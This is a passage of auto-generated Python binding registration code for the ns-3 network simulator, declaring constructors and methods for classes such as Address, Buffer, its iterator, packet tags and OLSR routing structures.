root_module['ns3::PacketTagIterator::Item']) register_Ns3PacketTagList_methods(root_module, root_module['ns3::PacketTagList']) register_Ns3PacketTagListTagData_methods(root_module, root_module['ns3::PacketTagList::TagData']) register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >']) register_Ns3Simulator_methods(root_module, root_module['ns3::Simulator']) register_Ns3SystemWallClockMs_methods(root_module, root_module['ns3::SystemWallClockMs']) register_Ns3Tag_methods(root_module, root_module['ns3::Tag']) register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer']) register_Ns3TimeWithUnit_methods(root_module, root_module['ns3::TimeWithUnit']) register_Ns3Timer_methods(root_module, root_module['ns3::Timer']) register_Ns3TimerImpl_methods(root_module, root_module['ns3::TimerImpl']) register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId']) register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation']) register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation']) register_Ns3Empty_methods(root_module, root_module['ns3::empty']) register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t']) register_Ns3Chunk_methods(root_module, root_module['ns3::Chunk']) register_Ns3Header_methods(root_module, root_module['ns3::Header']) register_Ns3Ipv4Header_methods(root_module, root_module['ns3::Ipv4Header']) register_Ns3Object_methods(root_module, root_module['ns3::Object']) register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator']) register_Ns3RandomVariableStream_methods(root_module, root_module['ns3::RandomVariableStream']) register_Ns3SequentialRandomVariable_methods(root_module, root_module['ns3::SequentialRandomVariable']) 
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >']) register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >']) register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >']) register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >']) register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >']) register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >']) register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >']) register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >']) 
register_Ns3SimpleRefCount__Ns3NetDeviceQueue_Ns3Empty_Ns3DefaultDeleter__lt__ns3NetDeviceQueue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >']) register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >']) register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >']) register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >']) register_Ns3SimpleRefCount__Ns3QueueItem_Ns3Empty_Ns3DefaultDeleter__lt__ns3QueueItem__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >']) register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >']) register_Ns3Socket_methods(root_module, root_module['ns3::Socket']) register_Ns3SocketIpTosTag_methods(root_module, root_module['ns3::SocketIpTosTag']) register_Ns3SocketIpTtlTag_methods(root_module, root_module['ns3::SocketIpTtlTag']) register_Ns3SocketIpv6HopLimitTag_methods(root_module, root_module['ns3::SocketIpv6HopLimitTag']) register_Ns3SocketIpv6TclassTag_methods(root_module, root_module['ns3::SocketIpv6TclassTag']) register_Ns3SocketPriorityTag_methods(root_module, root_module['ns3::SocketPriorityTag']) register_Ns3SocketSetDontFragmentTag_methods(root_module, 
root_module['ns3::SocketSetDontFragmentTag']) register_Ns3Time_methods(root_module, root_module['ns3::Time']) register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor']) register_Ns3Trailer_methods(root_module, root_module['ns3::Trailer']) register_Ns3TriangularRandomVariable_methods(root_module, root_module['ns3::TriangularRandomVariable']) register_Ns3UniformRandomVariable_methods(root_module, root_module['ns3::UniformRandomVariable']) register_Ns3WeibullRandomVariable_methods(root_module, root_module['ns3::WeibullRandomVariable']) register_Ns3ZetaRandomVariable_methods(root_module, root_module['ns3::ZetaRandomVariable']) register_Ns3ZipfRandomVariable_methods(root_module, root_module['ns3::ZipfRandomVariable']) register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor']) register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker']) register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue']) register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker']) register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase']) register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue']) register_Ns3ConstantRandomVariable_methods(root_module, root_module['ns3::ConstantRandomVariable']) register_Ns3DeterministicRandomVariable_methods(root_module, root_module['ns3::DeterministicRandomVariable']) register_Ns3EmpiricalRandomVariable_methods(root_module, root_module['ns3::EmpiricalRandomVariable']) register_Ns3EmptyAttributeAccessor_methods(root_module, root_module['ns3::EmptyAttributeAccessor']) register_Ns3EmptyAttributeChecker_methods(root_module, root_module['ns3::EmptyAttributeChecker']) register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue']) register_Ns3ErlangRandomVariable_methods(root_module, root_module['ns3::ErlangRandomVariable']) 
register_Ns3EventImpl_methods(root_module, root_module['ns3::EventImpl']) register_Ns3ExponentialRandomVariable_methods(root_module, root_module['ns3::ExponentialRandomVariable']) register_Ns3GammaRandomVariable_methods(root_module, root_module['ns3::GammaRandomVariable']) register_Ns3Ipv4_methods(root_module, root_module['ns3::Ipv4']) register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker']) register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue']) register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker']) register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue']) register_Ns3Ipv4MulticastRoute_methods(root_module, root_module['ns3::Ipv4MulticastRoute']) register_Ns3Ipv4Route_methods(root_module, root_module['ns3::Ipv4Route']) register_Ns3Ipv4RoutingProtocol_methods(root_module, root_module['ns3::Ipv4RoutingProtocol']) register_Ns3Ipv4StaticRouting_methods(root_module, root_module['ns3::Ipv4StaticRouting']) register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker']) register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue']) register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker']) register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue']) register_Ns3LogNormalRandomVariable_methods(root_module, root_module['ns3::LogNormalRandomVariable']) register_Ns3Mac48AddressChecker_methods(root_module, root_module['ns3::Mac48AddressChecker']) register_Ns3Mac48AddressValue_methods(root_module, root_module['ns3::Mac48AddressValue']) register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice']) register_Ns3NetDeviceQueue_methods(root_module, root_module['ns3::NetDeviceQueue']) register_Ns3NetDeviceQueueInterface_methods(root_module, root_module['ns3::NetDeviceQueueInterface']) register_Ns3NixVector_methods(root_module, 
root_module['ns3::NixVector']) register_Ns3Node_methods(root_module, root_module['ns3::Node']) register_Ns3NormalRandomVariable_methods(root_module, root_module['ns3::NormalRandomVariable']) register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker']) register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue']) register_Ns3OutputStreamWrapper_methods(root_module, root_module['ns3::OutputStreamWrapper']) register_Ns3Packet_methods(root_module, root_module['ns3::Packet']) register_Ns3ParetoRandomVariable_methods(root_module, root_module['ns3::ParetoRandomVariable']) register_Ns3QueueItem_methods(root_module, root_module['ns3::QueueItem']) register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue']) register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker']) register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue']) register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker']) register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue']) register_Ns3Ipv4ListRouting_methods(root_module, root_module['ns3::Ipv4ListRouting']) register_Ns3HashImplementation_methods(root_module, root_module['ns3::Hash::Implementation']) register_Ns3HashFunctionFnv1a_methods(root_module, root_module['ns3::Hash::Function::Fnv1a']) register_Ns3HashFunctionHash32_methods(root_module, root_module['ns3::Hash::Function::Hash32']) register_Ns3HashFunctionHash64_methods(root_module, root_module['ns3::Hash::Function::Hash64']) register_Ns3HashFunctionMurmur3_methods(root_module, root_module['ns3::Hash::Function::Murmur3']) register_Ns3OlsrAssociation_methods(root_module, root_module['ns3::olsr::Association']) register_Ns3OlsrAssociationTuple_methods(root_module, root_module['ns3::olsr::AssociationTuple']) register_Ns3OlsrDuplicateTuple_methods(root_module, root_module['ns3::olsr::DuplicateTuple']) 
register_Ns3OlsrIfaceAssocTuple_methods(root_module, root_module['ns3::olsr::IfaceAssocTuple']) register_Ns3OlsrLinkTuple_methods(root_module, root_module['ns3::olsr::LinkTuple']) register_Ns3OlsrMessageHeader_methods(root_module, root_module['ns3::olsr::MessageHeader']) register_Ns3OlsrMessageHeaderHello_methods(root_module, root_module['ns3::olsr::MessageHeader::Hello']) register_Ns3OlsrMessageHeaderHelloLinkMessage_methods(root_module, root_module['ns3::olsr::MessageHeader::Hello::LinkMessage']) register_Ns3OlsrMessageHeaderHna_methods(root_module, root_module['ns3::olsr::MessageHeader::Hna']) register_Ns3OlsrMessageHeaderHnaAssociation_methods(root_module, root_module['ns3::olsr::MessageHeader::Hna::Association']) register_Ns3OlsrMessageHeaderMid_methods(root_module, root_module['ns3::olsr::MessageHeader::Mid']) register_Ns3OlsrMessageHeaderTc_methods(root_module, root_module['ns3::olsr::MessageHeader::Tc']) register_Ns3OlsrMprSelectorTuple_methods(root_module, root_module['ns3::olsr::MprSelectorTuple']) register_Ns3OlsrNeighborTuple_methods(root_module, root_module['ns3::olsr::NeighborTuple']) register_Ns3OlsrOlsrState_methods(root_module, root_module['ns3::olsr::OlsrState']) register_Ns3OlsrPacketHeader_methods(root_module, root_module['ns3::olsr::PacketHeader']) register_Ns3OlsrRoutingProtocol_methods(root_module, root_module['ns3::olsr::RoutingProtocol']) register_Ns3OlsrRoutingTableEntry_methods(root_module, root_module['ns3::olsr::RoutingTableEntry']) register_Ns3OlsrTopologyTuple_methods(root_module, root_module['ns3::olsr::TopologyTuple']) register_Ns3OlsrTwoHopNeighborTuple_methods(root_module, root_module['ns3::olsr::TwoHopNeighborTuple']) return def register_Ns3Address_methods(root_module, cls): cls.add_binary_comparison_operator('<') cls.add_binary_comparison_operator('!=') cls.add_output_stream_operator() cls.add_binary_comparison_operator('==') ## address.h (module 'network'): ns3::Address::Address() [constructor] cls.add_constructor([]) ## 
address.h (module 'network'): ns3::Address::Address(uint8_t type, uint8_t const * buffer, uint8_t len) [constructor] cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): ns3::Address::Address(ns3::Address const & address) [copy constructor] cls.add_constructor([param('ns3::Address const &', 'address')]) ## address.h (module 'network'): bool ns3::Address::CheckCompatible(uint8_t type, uint8_t len) const [member function] cls.add_method('CheckCompatible', 'bool', [param('uint8_t', 'type'), param('uint8_t', 'len')], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::CopyAllFrom(uint8_t const * buffer, uint8_t len) [member function] cls.add_method('CopyAllFrom', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): uint32_t ns3::Address::CopyAllTo(uint8_t * buffer, uint8_t len) const [member function] cls.add_method('CopyAllTo', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint8_t', 'len')], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::CopyFrom(uint8_t const * buffer, uint8_t len) [member function] cls.add_method('CopyFrom', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')]) ## address.h (module 'network'): uint32_t ns3::Address::CopyTo(uint8_t * buffer) const [member function] cls.add_method('CopyTo', 'uint32_t', [param('uint8_t *', 'buffer')], is_const=True) ## address.h (module 'network'): void ns3::Address::Deserialize(ns3::TagBuffer buffer) [member function] cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'buffer')]) ## address.h (module 'network'): uint8_t ns3::Address::GetLength() const [member function] cls.add_method('GetLength', 'uint8_t', [], is_const=True) ## address.h (module 'network'): uint32_t ns3::Address::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## 
address.h (module 'network'): bool ns3::Address::IsInvalid() const [member function] cls.add_method('IsInvalid', 'bool', [], is_const=True) ## address.h (module 'network'): bool ns3::Address::IsMatchingType(uint8_t type) const [member function] cls.add_method('IsMatchingType', 'bool', [param('uint8_t', 'type')], is_const=True) ## address.h (module 'network'): static uint8_t ns3::Address::Register() [member function] cls.add_method('Register', 'uint8_t', [], is_static=True) ## address.h (module 'network'): void ns3::Address::Serialize(ns3::TagBuffer buffer) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'buffer')], is_const=True) return def register_Ns3AttributeConstructionList_methods(root_module, cls): ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor] cls.add_constructor([]) ## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function] cls.add_method('Add', 'void', [param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')]) ## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function] cls.add_method('Begin', 'std::_List_const_iterator< ns3::AttributeConstructionList::Item >', [], is_const=True) ## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member 
function] cls.add_method('End', 'std::_List_const_iterator< ns3::AttributeConstructionList::Item >', [], is_const=True) ## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('Find', 'ns3::Ptr< ns3::AttributeValue >', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True) return def register_Ns3AttributeConstructionListItem_methods(root_module, cls): ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor] cls.add_constructor([]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor] cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')]) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable] cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable] cls.add_instance_attribute('name', 'std::string', is_const=False) ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable] cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False) return def register_Ns3Buffer_methods(root_module, cls): ## buffer.h (module 'network'): ns3::Buffer::Buffer() [constructor] cls.add_constructor([]) ## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize) [constructor] cls.add_constructor([param('uint32_t', 'dataSize')]) ## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize, bool initialize) [constructor] cls.add_constructor([param('uint32_t', 'dataSize'), param('bool', 'initialize')]) ## buffer.h (module 'network'): 
ns3::Buffer::Buffer(ns3::Buffer const & o) [copy constructor] cls.add_constructor([param('ns3::Buffer const &', 'o')]) ## buffer.h (module 'network'): void ns3::Buffer::AddAtEnd(uint32_t end) [member function] cls.add_method('AddAtEnd', 'void', [param('uint32_t', 'end')]) ## buffer.h (module 'network'): void ns3::Buffer::AddAtEnd(ns3::Buffer const & o) [member function] cls.add_method('AddAtEnd', 'void', [param('ns3::Buffer const &', 'o')]) ## buffer.h (module 'network'): void ns3::Buffer::AddAtStart(uint32_t start) [member function] cls.add_method('AddAtStart', 'void', [param('uint32_t', 'start')]) ## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::Begin() const [member function] cls.add_method('Begin', 'ns3::Buffer::Iterator', [], is_const=True) ## buffer.h (module 'network'): void ns3::Buffer::CopyData(std::ostream * os, uint32_t size) const [member function] cls.add_method('CopyData', 'void', [param('std::ostream *', 'os'), param('uint32_t', 'size')], is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::CopyData(uint8_t * buffer, uint32_t size) const [member function] cls.add_method('CopyData', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')], is_const=True) ## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFragment(uint32_t start, uint32_t length) const [member function] cls.add_method('CreateFragment', 'ns3::Buffer', [param('uint32_t', 'start'), param('uint32_t', 'length')], is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Deserialize(uint8_t const * buffer, uint32_t size) [member function] cls.add_method('Deserialize', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]) ## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::End() const [member function] cls.add_method('End', 'ns3::Buffer::Iterator', [], is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSerializedSize() const [member function] 
cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSize() const [member function] cls.add_method('GetSize', 'uint32_t', [], is_const=True) ## buffer.h (module 'network'): uint8_t const * ns3::Buffer::PeekData() const [member function] cls.add_method('PeekData', 'uint8_t const *', [], is_const=True) ## buffer.h (module 'network'): void ns3::Buffer::RemoveAtEnd(uint32_t end) [member function] cls.add_method('RemoveAtEnd', 'void', [param('uint32_t', 'end')]) ## buffer.h (module 'network'): void ns3::Buffer::RemoveAtStart(uint32_t start) [member function] cls.add_method('RemoveAtStart', 'void', [param('uint32_t', 'start')]) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function] cls.add_method('Serialize', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')], is_const=True) return def register_Ns3BufferIterator_methods(root_module, cls): ## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator(ns3::Buffer::Iterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::Buffer::Iterator const &', 'arg0')]) ## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator() [constructor] cls.add_constructor([]) ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size) [member function] cls.add_method('CalculateIpChecksum', 'uint16_t', [param('uint16_t', 'size')]) ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size, uint32_t initialChecksum) [member function] cls.add_method('CalculateIpChecksum', 'uint16_t', [param('uint16_t', 'size'), param('uint32_t', 'initialChecksum')]) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetDistanceFrom(ns3::Buffer::Iterator const & o) const [member function] cls.add_method('GetDistanceFrom', 'uint32_t', [param('ns3::Buffer::Iterator const &', 'o')], 
is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetRemainingSize() const [member function] cls.add_method('GetRemainingSize', 'uint32_t', [], is_const=True) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetSize() const [member function] cls.add_method('GetSize', 'uint32_t', [], is_const=True) ## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsEnd() const [member function] cls.add_method('IsEnd', 'bool', [], is_const=True) ## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsStart() const [member function] cls.add_method('IsStart', 'bool', [], is_const=True) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next() [member function] cls.add_method('Next', 'void', []) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next(uint32_t delta) [member function] cls.add_method('Next', 'void', [param('uint32_t', 'delta')]) ## buffer.h (module 'network'): uint8_t ns3::Buffer::Iterator::PeekU8() [member function] cls.add_method('PeekU8', 'uint8_t', []) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev() [member function] cls.add_method('Prev', 'void', []) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev(uint32_t delta) [member function] cls.add_method('Prev', 'void', [param('uint32_t', 'delta')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Read(uint8_t * buffer, uint32_t size) [member function] cls.add_method('Read', 'void', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Read(ns3::Buffer::Iterator start, uint32_t size) [member function] cls.add_method('Read', 'void', [param('ns3::Buffer::Iterator', 'start'), param('uint32_t', 'size')]) ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadLsbtohU16() [member function] cls.add_method('ReadLsbtohU16', 'uint16_t', []) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadLsbtohU32() [member 
function] cls.add_method('ReadLsbtohU32', 'uint32_t', []) ## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadLsbtohU64() [member function] cls.add_method('ReadLsbtohU64', 'uint64_t', []) ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadNtohU16() [member function] cls.add_method('ReadNtohU16', 'uint16_t', []) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadNtohU32() [member function] cls.add_method('ReadNtohU32', 'uint32_t', []) ## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadNtohU64() [member function] cls.add_method('ReadNtohU64', 'uint64_t', []) ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadU16() [member function] cls.add_method('ReadU16', 'uint16_t', []) ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadU32() [member function] cls.add_method('ReadU32', 'uint32_t', []) ## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadU64() [member function] cls.add_method('ReadU64', 'uint64_t', []) ## buffer.h (module 'network'): uint8_t ns3::Buffer::Iterator::ReadU8() [member function] cls.add_method('ReadU8', 'uint8_t', []) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(uint8_t const * buffer, uint32_t size) [member function] cls.add_method('Write', 'void', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(ns3::Buffer::Iterator start, ns3::Buffer::Iterator end) [member function] cls.add_method('Write', 'void', [param('ns3::Buffer::Iterator', 'start'), param('ns3::Buffer::Iterator', 'end')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU16(uint16_t data) [member function] cls.add_method('WriteHtolsbU16', 'void', [param('uint16_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU32(uint32_t data) [member function] cls.add_method('WriteHtolsbU32', 'void', [param('uint32_t', 'data')]) ## 
buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU64(uint64_t data) [member function] cls.add_method('WriteHtolsbU64', 'void', [param('uint64_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU16(uint16_t data) [member function] cls.add_method('WriteHtonU16', 'void', [param('uint16_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU32(uint32_t data) [member function] cls.add_method('WriteHtonU32', 'void', [param('uint32_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU64(uint64_t data) [member function] cls.add_method('WriteHtonU64', 'void', [param('uint64_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU16(uint16_t data) [member function] cls.add_method('WriteU16', 'void', [param('uint16_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU32(uint32_t data) [member function] cls.add_method('WriteU32', 'void', [param('uint32_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU64(uint64_t data) [member function] cls.add_method('WriteU64', 'void', [param('uint64_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data) [member function] cls.add_method('WriteU8', 'void', [param('uint8_t', 'data')]) ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data, uint32_t len) [member function] cls.add_method('WriteU8', 'void', [param('uint8_t', 'data'), param('uint32_t', 'len')]) return def register_Ns3ByteTagIterator_methods(root_module, cls): ## packet.h (module 'network'): ns3::ByteTagIterator::ByteTagIterator(ns3::ByteTagIterator const & arg0) [copy constructor] cls.add_constructor([param('ns3::ByteTagIterator const &', 'arg0')]) ## packet.h (module 'network'): bool ns3::ByteTagIterator::HasNext() const [member function] cls.add_method('HasNext', 'bool', [], is_const=True) ## packet.h (module 'network'): 
ns3::ByteTagIterator::Item ns3::ByteTagIterator::Next() [member function] cls.add_method('Next', 'ns3::ByteTagIterator::Item', []) return def register_Ns3ByteTagIteratorItem_methods(root_module, cls): ## packet.h (module 'network'): ns3::ByteTagIterator::Item::Item(ns3::ByteTagIterator::Item const & arg0) [copy constructor] cls.add_constructor([param('ns3::ByteTagIterator::Item const &', 'arg0')]) ## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetEnd() const [member function] cls.add_method('GetEnd', 'uint32_t', [], is_const=True) ## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetStart() const [member function] cls.add_method('GetStart', 'uint32_t', [], is_const=True) ## packet.h (module 'network'): void ns3::ByteTagIterator::Item::GetTag(ns3::Tag & tag) const [member function] cls.add_method('GetTag', 'void', [param('ns3::Tag &', 'tag')], is_const=True) ## packet.h (module 'network'): ns3::TypeId ns3::ByteTagIterator::Item::GetTypeId() const [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True) return def register_Ns3ByteTagList_methods(root_module, cls): ## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList() [constructor] cls.add_constructor([]) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList(ns3::ByteTagList const & o) [copy constructor] cls.add_constructor([param('ns3::ByteTagList const &', 'o')]) ## byte-tag-list.h (module 'network'): ns3::TagBuffer ns3::ByteTagList::Add(ns3::TypeId tid, uint32_t bufferSize, int32_t 